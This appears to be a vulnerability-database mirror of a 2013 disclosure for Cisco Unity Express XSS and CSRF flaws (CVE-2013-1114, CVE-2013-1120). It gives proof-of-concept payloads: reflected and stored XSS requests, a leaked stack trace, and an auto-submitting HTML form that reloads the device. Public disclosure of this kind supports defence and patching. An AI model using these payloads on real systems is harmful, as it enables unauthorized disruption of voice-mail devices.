Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cisco Unity Express Cross Site Request Forgery / Cross Site Scripting

🗓️ 05 Feb 2013 00:00:00Reported by Jacob HolcombType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

Cisco Unity Express Multiple Vulnerabilities reported and disclosed in Dec 2012 and Feb 2013 respectively. CVE-2013-1114 (XSS) and CVE-2013-1120 (CSRF) identified. Proof of concept code for reflected XSS and information disclosure provided

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Cisco Unity Express Multiple Vulnerabilities
5 Feb 201300:00
zdt
Circl		CVE-2013-1114
5 Feb 201300:00
circl
Circl		CVE-2013-1120
5 Feb 201300:00
circl
Cisco		Cisco Unity Express Cross-Site Scripting Vulnerabilities
1 Feb 201320:04
cisco
Cisco		Cisco Unity Express Multiple Cross-Site Request Forgery Vulnerabilities
1 Feb 201320:03
cisco
CVE		CVE-2013-1114
13 Feb 201323:00
cve
CVE		CVE-2013-1120
6 Feb 201311:00
cve
Cvelist		CVE-2013-1114
13 Feb 201323:00
cvelist
Cvelist		CVE-2013-1120
6 Feb 201311:00
cvelist
Exploit DB		Cisco Unity Express - Multiple Vulnerabilities
5 Feb 201300:00
exploitdb
Rows per page
`# Exploit Title: Cisco Unity Express Multiple Vulnerabilities  
# Reported: December 2012  
# Disclosed: February 2013  
# Author: Jacob Holcomb of Independent Security Evaluators  
# CVE: XSS - CVE-2013-1114 and CSRF - CVE-2013-1120  
# http://infosec42.blogspot.com/2013/02/cisco-unity-express-vulnerabilites.html  
  
Cisco Advisory  
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114  
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120  
  
Proof of Concept  
XSS - CVE-2013-1114:  
GET:  
Reflective XSS & Info disclosure  
http://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=><script>alert(42)</script>  
  
Information Disclosure  
Location: /Web/WEB-INF/screens/main.jsp  
Error Location: /Web/WEB-INF/screens/prompts/ListScripts.jsp  
Internal Servlet Error:  
  
javax.servlet.ServletException: invalid character at position 1 in >  
org.apache.jasper.runtime.PageContextImpl.handlePageException (Unknown Source)  
WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:2245)  
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)  
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)  
java.security.AccessController.doPrivileged (AccessController.java:273)  
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)  
org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)  
WEB_0002dINF.screens.main._jspService (main.java:396)  
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)  
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)  
java.security.AccessController.doPrivileged (AccessController.java:273)  
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)  
org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)  
org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)  
com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)  
org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.core.ContextManager.internalService (Unknown Source)  
org.apache.tomcat.core.ContextManager.service (Unknown Source)  
org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)  
org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)  
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)  
java.lang.Thread.run (Thread.java:777)  
  
Root cause:  
java.lang.NumberFormatException: invalid character at position 1 in >  
java.lang.Throwable. (Throwable.java:166)  
java.lang.Integer.parseInt (Integer.java:775)  
java.lang.Integer.parseInt (Integer.java:262)  
com.cisco.aesop.gui.taglibs.PagingTableTag.doAfterBody (PagingTableTag.java:274)  
WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:1903)  
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)  
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)  
java.security.AccessController.doPrivileged (AccessController.java:273)  
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)  
org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)  
WEB_0002dINF.screens.main._jspService (main.java:396)  
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)  
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)  
java.security.AccessController.doPrivileged (AccessController.java:273)  
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)  
org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)  
org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)  
com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)  
org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.core.ContextManager.internalService (Unknown Source)  
org.apache.tomcat.core.ContextManager.service (Unknown Source)  
org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)  
org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)  
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)  
java.lang.Thread.run (Thread.java:777)  
  
  
  
POST:  
Persistent XSS  
http://X.X.X.X/Web/SA3/AddHoliday.do  
POST Data: holiday.description=><script>alert(42)</script>&submitType=ADD  
  
  
CSRF - CVE-2013-1120:  
  
<html>  
<!-- # Exploit Title: Cisco Unity Express CSRF  
# Date: Discovered and reported December 2012  
# Disclosed: February 2013  
# Author: Jacob Holcomb of Independent Security Evaluators  
# Software: Cisco Unity Express  
# CVE : CVE-2013-1120 for the CSRF  
# Note: All the HTML forms are susceptible to forgery -->  
  
<head>  
<title>Reload Cisco Unity Express CSRF</title>  
</head>  
  
<body>  
  
<form name="CUEreload" action="http://X.X.X.X/Web/SA/SaveConfiguration.do" method="post">  
<input type="hidden" name="submitType" value="RELOAD"/>  
</form>  
  
<script>  
document.CUEreload.submit();  
</script>  
  
</body>  
</html>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Feb 2013 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.1338
cisco unity expressmultiple vulnerabilitiesdec 2012feb 2013xsscsrfproof of conceptreflected xssinformation disclosure
30